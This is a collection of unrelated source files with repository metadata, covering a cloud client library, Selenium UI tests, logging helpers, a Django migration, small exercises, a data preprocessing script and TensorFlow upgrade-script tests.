raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def streaming_annotate_video(self,
requests: Iterator[video_intelligence.StreamingAnnotateVideoRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[video_intelligence.StreamingAnnotateVideoResponse]:
r"""Performs video annotation with bidirectional
streaming: emitting results while sending video/audio
bytes. This method is only available via the gRPC API
(not REST).
Args:
requests (Iterator[google.cloud.videointelligence_v1p3beta1.types.StreamingAnnotateVideoRequest]):
The request object iterator. The top-level message sent by the
client for the `StreamingAnnotateVideo` method. Multiple
`StreamingAnnotateVideoRequest` messages are sent. The
first message must only contain a `StreamingVideoConfig`
message. All subsequent messages must only contain
`input_content` data.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.videointelligence_v1p3beta1.types.StreamingAnnotateVideoResponse]:
StreamingAnnotateVideoResponse is the only message returned to the client
by StreamingAnnotateVideo. A series of zero or more
StreamingAnnotateVideoResponse messages are streamed
back to the client.
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.streaming_annotate_video]
# Send the request.
response = rpc(
requests,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-videointelligence",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"StreamingVideoIntelligenceServiceClient",
)
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
c26b1e698d6b28cb8ba41501b866f0a0d5697daf
|
85ab389658b2fbbb0e56f35e90df35ffb7b3c6dd
|
/UI_Automation/Tests/test_A_HomePage.py
|
bdf3d6557013817996f3552a0796fb977186bae4
|
[] |
no_license
|
akashgkrishnan/Fm_Staging_automation
|
0a306ba0d931db450e3156cdbe8111f63d214889
|
5e8903226ebaa4d512f4f9c9fa581c0d8e227726
|
refs/heads/master
| 2023-05-13T05:56:02.831480 | 2020-06-03T07:11:26 | 2020-06-03T07:11:26 | 263,627,594 | 0 | 0 | null | 2021-06-02T01:50:17 | 2020-05-13T12:46:34 |
Python
|
UTF-8
|
Python
| false | false | 6,056 |
py
|
from _csv import reader
from random import randint
from csv import writer
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from UI_Automation.pageObjects.EmployerHome import EmployerHome
from UI_Automation.pageObjects.EmployerSignUp import EmployerSignUp
from UI_Automation.pageObjects.FmContactPage import FmContactPage
from UI_Automation.pageObjects.FmHomeEmployer import FmEmployerPage
from UI_Automation.pageObjects.FmHomePage import FmHomePage
from UI_Automation.pageObjects.EmployerSignInPage import SignInPage
from UI_Automation.utilities.BaseClass import BaseClass
from time import sleep
class TestFmHomePage(BaseClass):
def random_mobile(self):
return randint(1111111111, 5555555555)
def test_employer_FM_home(self):
home_page = FmHomePage(self.driver)
home_page.get_employer().click()
employer_intro = FmEmployerPage(self.driver)
employer_intro.get_request_demo().click()
sleep(2)
employer_intro.get_name_field().send_keys('Akash G Krishnan')
employer_intro.get_email_field().send_keys('[email protected]')
employer_intro.get_phone_field().send_keys('8130233807')
employer_intro.get_company_field().send_keys('KRISHNAN')
employer_intro.get_company_website_field().send_keys('www.google.co.in')
employer_intro.get_submit_demo().click()
sleep(7)
def test_contact_page(self):
home_page = FmHomePage(self.driver)
home_page.get_contact().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//h1[contains(text(),"Hello!")]'))
)
contact_page = FmContactPage(self.driver)
contact_page.get_name_field().send_keys("Akash G Krishnan")
contact_page.get_company_field().send_keys("KRISHNAN")
mobile = self.random_mobile()
contact_page.get_email_field().send_keys(str(mobile) + '@mailinator.com')
contact_page.get_phone_field().send_keys(mobile)
contact_page.get_query_field().send_keys('test script run using selenium web driver api. test script run using selenium web driver api.')
contact_page.get_submit_btn().click()
sleep(5)
assert contact_page.get_success_text().text == 'Thank You!'
def test_interviewer_landing(self):
home_page = FmHomePage(self.driver)
home_page.get_interviewer().click()
sleep(3)
def test_employer_signUp(self):
home_page = FmHomePage(self.driver)
home_page.get_employer_signUp().click()
sleep(5)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
employee_page = EmployerSignUp(self.driver)
employee_page.get_company().send_keys('Automation Company 123')
employee_page.get_fullName().send_keys('Akash G Krishnan ak')
employee_page.get_email().click()
mobile = self.random_mobile()
email = str(mobile) + '@mailinator.com'
employee_page.get_email().send_keys(email)
password = 'Testing@123'
employee_page.get_password().send_keys(password)
employee_page.get_confirm_password().send_keys(password)
with open('..\TestData\login.txt', 'a') as file:
csv_writer = writer(file)
csv_writer.writerow([email, password])
employee_page.get_signup_button().click()
sleep(3)
assert 'Click on the verification link to activate your account.' in employee_page.get_success_modal().text
employee_page.get_success_confirm().click()
self.driver.get('https://www.mailinator.com/')
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(mobile)
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(Keys.ENTER)
self.driver.find_element_by_xpath('//tr[1]//td[3]').click()
self.driver.find_element_by_xpath("//button[contains(text(),'Show Links')]").click()
verification_url = self.driver.find_element_by_xpath("//div[@id='clicklinks']").text
self.driver.get(verification_url)
assert 'Welcome to FoxMatrix' in self.driver.find_element_by_xpath("//h2[contains(text(),'Welcome to FoxMatrix')]").text
self.driver.find_element_by_xpath("//button[contains(text(),'Go to Login')]").click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(email)
sign_in.get_password_field().send_keys(password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, "//button[contains(text(),'Setup Your Account')]"))
)
def test_employer_signIn(self):
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
with open('..\TestData\login.txt') as file:
csv_Reader = list(reader(file))[::-1]
self.email =csv_Reader[1][0]
self.password = csv_Reader[1][1]
home_page = FmHomePage(self.driver)
home_page.get_employer_sign_in().click()
sleep(3)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(self.email)
sign_in.get_password_field().send_keys(self.password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.LINK_TEXT, 'Setup Your Account'))
)
|
[
"[email protected]"
] | |
600f054f49e78cf24098421655e1523203fa53d8
|
9553ebbc332975477a40be1ca3f333beff9d382c
|
/my_logger.py
|
643c3f75aeb6ba74bcc4323ad85ddf902407827c
|
[] |
no_license
|
smellycats/SX-UnionKafkaCSClient
|
f406056ac726968f71373c0199d46c73fbbbff17
|
2a1c52bdce32e7e30e2f1f23edfae89346cfa0fd
|
refs/heads/master
| 2021-09-05T04:20:48.498408 | 2017-11-28T08:54:35 | 2017-11-28T08:54:35 | 112,099,977 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,616 |
py
|
import os
import logging
import logging.handlers
def debug_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[line:%(lineno)d] \
[%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def online_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def access_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
access_logger = logging.getLogger('access')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=100 * 1024 * 1024, backupCount=10)
access_logger.setLevel(logging.INFO)
access_logger.addHandler(rthandler)
|
[
"[email protected]"
] | |
5c92f6a56671d9890fb4aef4a30287078d8d5c25
|
39a9cd1d168dbd73987385f94ecb968f8eb0be80
|
/medicine/migrations/0013_remove_type_med_type.py
|
a168c64968198db356545acbe34e0105ac956892
|
[] |
no_license
|
suhaskm96/medisearch
|
dc41e05247b0dc7a72fbd26917de3b895407e27e
|
629629bcf20396a8c7ed25d384662d15ae7f1c90
|
refs/heads/master
| 2020-06-24T12:51:33.445648 | 2018-06-15T10:52:38 | 2018-06-15T10:52:38 | 198,967,048 | 1 | 0 | null | 2019-07-26T07:16:01 | 2019-07-26T07:16:00 | null |
UTF-8
|
Python
| false | false | 389 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-14 23:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('medicine', '0012_type_med_type'),
]
operations = [
migrations.RemoveField(
model_name='type',
name='med_type',
),
]
|
[
"[email protected]"
] | |
6f1601446984a091f96b9571f04aae8710b12672
|
66765829bd7bad8d56624552a2cb41d9d4576025
|
/solved/06/abc189_d.py
|
0cdaf3a023d2e406f6287f2a682022187fc5c285
|
[] |
no_license
|
murakami10/atc_python
|
9c0c935c58b55177586b0aa23a25032b59beaca8
|
98f91f43e4cbfadb35a1de250fca98ae53457023
|
refs/heads/main
| 2023-03-06T10:05:55.248376 | 2021-02-13T06:29:23 | 2021-02-13T06:29:23 | 320,210,577 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
N = int(input())
S = []
for i in range(N):
S.append(str(input()))
ans = [[0] * (N + 1) for _ in range(2)]
ans[0][0] = 1
ans[1][0] = 1
for i in range(len(S)):
if S[i] == "AND":
ans[0][i + 1] = ans[0][i]
ans[1][i + 1] = 2 * ans[1][i] + ans[0][i]
else:
ans[0][i + 1] = 2 * ans[0][i] + ans[1][i]
ans[1][i + 1] = ans[1][i]
print(ans[0][-1])
# https://atcoder.jp/contests/abc189/tasks/abc189_d
|
[
"[email protected]"
] | |
76cae0ffbd3466e9e2f9290d4d10df7eb386ab9a
|
3a534e848c3962ccaad700bdd08bcdaa02f25ddb
|
/a4/movecircle.py
|
43b465bdd17d8e1fbccf626ca43ac4e933632acb
|
[] |
no_license
|
dragikamov/Advanced_Programming_in_Python
|
48460d3b24de46b23e289224bfc3dc06d8f364e9
|
db7491de24a54bc7dcac415fc7bd498afc3923d3
|
refs/heads/master
| 2020-04-27T13:08:24.240850 | 2019-03-07T14:18:18 | 2019-03-07T14:18:18 | 174,357,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 525 |
py
|
# 350112
# a4 1.py
# Dragi Kamov
# [email protected]
from graphics import *
def main():
win = GraphWin()
for i in range(10):
shape = Rectangle(Point(30, 30), Point(70, 70))
shape.setOutline("red")
shape.setFill("red")
shape.draw(win)
p = win.getMouse()
c = shape.getCenter()
dx = p.getX() - c.getX()
dy = p.getY() - c.getY()
shape.move(dx, dy)
win.close()
main()
|
[
"[email protected]"
] | |
660d026a4cd37bb499fea685b14e4c17e430fcc2
|
ab5cdf8f2de94c327e4679da84f941b1f3c04db4
|
/kubernetes/test/test_v1_key_to_path.py
|
bb33f64a5c5d213fb5766a93b9a0fdc02a60e156
|
[
"Apache-2.0"
] |
permissive
|
diannaowa/client-python
|
a4a92a125178db26004eaef5062f9b1b581b49a8
|
5e268fb0b6f21a535a14a7f968b84ed4486f6774
|
refs/heads/master
| 2020-12-02T22:06:03.687696 | 2017-06-30T21:42:50 | 2017-06-30T21:42:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 829 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_key_to_path import V1KeyToPath
class TestV1KeyToPath(unittest.TestCase):
""" V1KeyToPath unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1KeyToPath(self):
"""
Test V1KeyToPath
"""
model = kubernetes.client.models.v1_key_to_path.V1KeyToPath()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
f3bb7cc1fd5db41d05739da7d79ff50bbc8d581e
|
7eed7e912038c9a9cdb360aa3c91ac7fcbe7d8a5
|
/Chapter13/sort_service.py
|
a7cd2466b671755179dddc5e8340fac6866caba6
|
[
"MIT"
] |
permissive
|
4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition
|
5228cc99f2e89fe9814140049ea400c29481a664
|
6310577f0a71588cf28d42994b5d9581640b5870
|
refs/heads/master
| 2023-03-27T08:42:49.488468 | 2021-03-22T03:07:47 | 2021-03-28T05:06:40 | 275,771,956 | 0 | 0 |
MIT
| 2020-06-29T08:16:50 | 2020-06-29T08:16:49 | null |
UTF-8
|
Python
| false | false | 1,099 |
py
|
import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
nums = json.loads(data.decode())
curr = 1
while curr < len(nums):
if nums[curr] >= nums[curr - 1]:
curr += 1
else:
nums[curr], nums[curr - 1] = nums[curr - 1], nums[curr]
if curr > 1:
curr -= 1
return json.dumps(nums).encode()
async def sort_request(reader, writer):
print("Received connection")
length = await reader.read(8)
data = await reader.readexactly(int.from_bytes(length, "big"))
result = await asyncio.get_event_loop().run_in_executor(
None, sort_in_process, data
)
print("Sorted list")
writer.write(result)
writer.close()
print("Connection closed")
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
|
[
"[email protected]"
] | |
597e6dfa6aa66205665a9db5cf233af448ee78b7
|
e495badcd88e4f95ae99f33f8aa740d1e5e7a875
|
/0x08-python-more_classes/3-rectangle.py
|
7604bd6fe4645a74c0d2a0bee600b626b7b9c889
|
[] |
no_license
|
Immaannn2222/holbertonschool-higher_level_programming
|
059ed232af3d1ad54e4d7eff97a0dcb4d61585fb
|
1c65e5a6d3632f7e28803ebb2699229390883ec7
|
refs/heads/master
| 2022-12-17T23:42:00.632652 | 2020-09-24T18:02:12 | 2020-09-24T18:02:12 | 259,304,604 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,375 |
py
|
#!/usr/bin/python3
"""Rectangle class"""
class Rectangle:
"""Rectangle proporties"""
def __init__(self, width=0, height=0):
self.width = width
self.height = height
@property
def width(self):
return self.__width
@width.setter
def width(self, value):
if isinstance(value, int):
if value >= 0:
self.__width = value
else:
raise ValueError("width must be >= 0")
else:
raise TypeError("width must be an integer")
@property
def height(self):
return self.__height
@height.setter
def height(self, value):
if isinstance(value, int):
if value >= 0:
self.__height = value
else:
raise ValueError("height must be >= 0")
else:
raise TypeError("height must be an integer")
def area(self):
return self.__width * self.__height
def perimeter(self):
if self.__height == 0 or self.__width == 0:
return 0
return self.__width * 2 + self.__height * 2
def __str__(self):
if self.__height <= 0 or self.__width <= 0:
return ""
new_str = ""
for x in range(self.__height):
new_str += "#" * self.__width
new_str += '\n'
return new_str[:-1]
|
[
"[email protected]"
] | |
9e6c62a0b8c8c640c66886053a78168485cff232
|
077c91b9d5cb1a6a724da47067483c622ce64be6
|
/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs_with_max_replays_5/interreplay_35_l_3/openflow_replay_config.py
|
34b65c25622a41540245bfa018421a1f35b62a19
|
[] |
no_license
|
Spencerx/experiments
|
0edd16398725f6fd9365ddbb1b773942e4878369
|
aaa98b0f67b0d0c0c826b8a1565916bf97ae3179
|
refs/heads/master
| 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,022 |
py
|
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import OpenFlowReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pyretic.py -m p0 pyretic.examples.firewall_for_sts_no_close', label='c1', address='127.0.0.1', cwd='../pyretic', kill_cmd='ps aux | grep -e pox -e pyretic | grep -v simulator | cut -c 9-15 | xargs kill -9')],
topology_class=MeshTopology,
topology_params="num_switches=3",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = OpenFlowReplayer(simulation_config, "experiments/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs/interreplay_35_l_3/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'None'
|
[
"[email protected]"
] | |
4c54990b4fdbf3433f3e4d0b319960ecfb420659
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/563-tideGauge.py
|
edc98a675063801b2e15b98450b11705c42804f6
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,984 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 563
y = 564
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
|
[
"[email protected]"
] | |
4a9659895ff26415d2e5c664d5a506eec24aa53e
|
511c026261ecbccf90c9f561e1c0c66d45ac587e
|
/tensorflow/tools/compatibility/tf_upgrade_v2_test.py
|
23446e30b12d2ca8d9611f6b0b8adfb697bec02c
|
[
"Apache-2.0"
] |
permissive
|
wulongyuan/tensorflow
|
6d064af7ecc3404a7f2afe754002c6033e61740d
|
2a5abdb77806e06ce7e2820ede6233ca79cf5625
|
refs/heads/master
| 2020-04-17T06:42:24.947326 | 2019-01-18T03:02:03 | 2019-01-18T03:11:11 | 166,336,164 | 1 | 0 |
Apache-2.0
| 2019-01-18T03:14:49 | 2019-01-18T03:14:48 | null |
UTF-8
|
Python
| false | false | 41,192 |
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.0 upgrader."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import tempfile
import six
import tensorflow as tf
# OSS TF V2 import placeholder.
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test as test_lib
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_export
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.compatibility import ast_edits
from tensorflow.tools.compatibility import tf_upgrade_v2
def get_symbol_for_name(root, name):
name_parts = name.split(".")
symbol = root
# Iterate starting with second item since 1st item is "tf.".
for part in name_parts[1:]:
symbol = getattr(symbol, part)
return symbol
def get_args(symbol):
if hasattr(inspect, "signature"):
signature = inspect.signature(symbol)
# Ignore *args and **kwargs for now.
return [param.name for param in signature.parameters.values()
if param.kind == param.POSITIONAL_OR_KEYWORD]
return tf_inspect.getargspec(symbol)[0]
def get_func_and_args_from_str(call_str):
"""Parse call string to get function and argument names.
Args:
call_str: Call string must be in the form:
`tf.foo(arg1=val1, arg2=val2, ...)`.
Returns:
(function_name, list of arg names) tuple.
"""
open_paren_index = call_str.find("(")
close_paren_index = call_str.rfind(")")
function_name = call_str[:call_str.find("(")]
args = call_str[open_paren_index+1:close_paren_index].split(",")
args = [arg.split("=")[0].strip() for arg in args]
args = [arg for arg in args if arg] # filter out empty strings
return function_name, args
class TestUpgrade(test_util.TensorFlowTestCase):
"""Test various APIs that have been changed in 2.0.
We also test whether a converted file is executable. test_file_v1_10.py
aims to exhaustively test that API changes are convertible and actually
work when run with current TensorFlow.
"""
@classmethod
def setUpClass(cls):
cls.v2_symbols = {}
if not hasattr(tf.compat, "v2"):
return
def symbol_collector(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names_v2 = tf_export.get_v2_names(attr)
for name in api_names_v2:
cls.v2_symbols["tf." + name] = attr
visitor = public_api.PublicAPIVisitor(symbol_collector)
traverse.traverse(tf.compat.v2, visitor)
def _upgrade(self, old_file_text):
in_file = six.StringIO(old_file_text)
out_file = six.StringIO()
upgrader = ast_edits.ASTCodeUpgrader(tf_upgrade_v2.TFAPIChangeSpec())
count, report, errors = (
upgrader.process_opened_file("test.py", in_file,
"test_out.py", out_file))
return count, report, errors, out_file.getvalue()
def testParseError(self):
_, report, unused_errors, unused_new_text = self._upgrade(
"import tensorflow as tf\na + \n")
self.assertTrue(report.find("Failed to parse") != -1)
def testReport(self):
text = "tf.angle(a)\n"
_, report, unused_errors, unused_new_text = self._upgrade(text)
# This is not a complete test, but it is a sanity test that a report
# is generating information.
self.assertTrue(report.find("Renamed function `tf.angle` to "
"`tf.math.angle`"))
def testRename(self):
text = "tf.conj(a)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.math.conj(a)\n")
text = "tf.rsqrt(tf.log_sigmoid(3.8))\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.math.rsqrt(tf.math.log_sigmoid(3.8))\n")
def testAllAPI(self):
if not hasattr(tf.compat, "v2"):
return
# Converts all symbols in the v1 namespace to the v2 namespace, raising
# an error if the target of the conversion is not in the v2 namespace.
# Please regenerate the renames file or edit any manual renames if this
# test fails.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names = tf_export.get_v1_names(attr)
for name in api_names:
_, _, _, text = self._upgrade("tf." + name)
if (text and
not text.startswith("tf.compat.v1") and
text not in self.v2_symbols):
self.assertFalse(
True, "Symbol %s generated from %s not in v2 API" % (
text, name))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testAllAPIV1(self):
collect = True
v1_symbols = set([])
# Symbols which may be generated by the conversion script which do not exist
# in TF 1.x. This should be a very short list of symbols which are
# experimental in 1.x but stable for 2.x.
whitelisted_v2_only_symbols = set(["tf.saved_model.save"])
# Converts all symbols in the v1 namespace to the v2 namespace, raising
# an error if the target of the conversion is not in the v1 namespace.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
api_names = tf_export.get_v1_names(attr)
for name in api_names:
if collect:
v1_symbols.add("tf." + name)
else:
_, _, _, text = self._upgrade("tf." + name)
if (text and
not text.startswith("tf.compat.v1") and
not text.startswith("tf.estimator") and
text not in v1_symbols and
text not in whitelisted_v2_only_symbols):
self.assertFalse(
True, "Symbol %s generated from %s not in v1 API" % (
text, name))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
collect = False
traverse.traverse(tf.compat.v1, visitor)
def testV1KeywordArgNames(self):
all_keyword_renames = (
tf_upgrade_v2.TFAPIChangeSpec().function_keyword_renames)
# Visitor that verifies V1 argument names.
def arg_test_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
names_v1 = tf_export.get_v1_names(attr)
for name in names_v1:
name = "tf.%s" % name
if name not in all_keyword_renames:
continue
arg_names_v1 = tf_inspect.getargspec(attr)[0]
keyword_renames = all_keyword_renames[name]
self.assertEqual(type(keyword_renames), dict)
# Assert that v1 function has valid v1 argument names.
for from_name, _ in keyword_renames.items():
self.assertIn(
from_name, arg_names_v1,
"%s not found in %s arguments: %s" %
(from_name, name, str(arg_names_v1)))
visitor = public_api.PublicAPIVisitor(arg_test_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testV2KeywordArgNames(self):
# This test converts a call of the form:
# tf.foo(arg1=0, arg2=1, ...)
# to 2.0. Then, checks that converted function has valid argument names.
if not hasattr(tf.compat, "v2"):
return
v2_arg_exceptions = {
"verify_shape_is_now_always_true",
# These arguments should not be used, they just specify
# that a function takes named arguments.
"keyword_required",
"_sentinel",
}
v1_name_exceptions = {
"tf.print", # requires print_function import
}
function_warnings = (
tf_upgrade_v2.TFAPIChangeSpec().function_warnings)
function_transformers = (
tf_upgrade_v2.TFAPIChangeSpec().function_transformers)
keyword_renames = (
tf_upgrade_v2.TFAPIChangeSpec().function_keyword_renames)
# Visitor that converts to V2 and checks V2 argument names.
def conversion_visitor(unused_path, unused_parent, children):
for child in children:
_, attr = tf_decorator.unwrap(child[1])
if not tf_inspect.isfunction(attr):
continue
names_v1 = tf_export.get_v1_names(attr)
arg_names_v1 = get_args(attr)
for name in names_v1:
tf_name = "tf.%s" % name
if tf_name in function_warnings or tf_name in function_transformers:
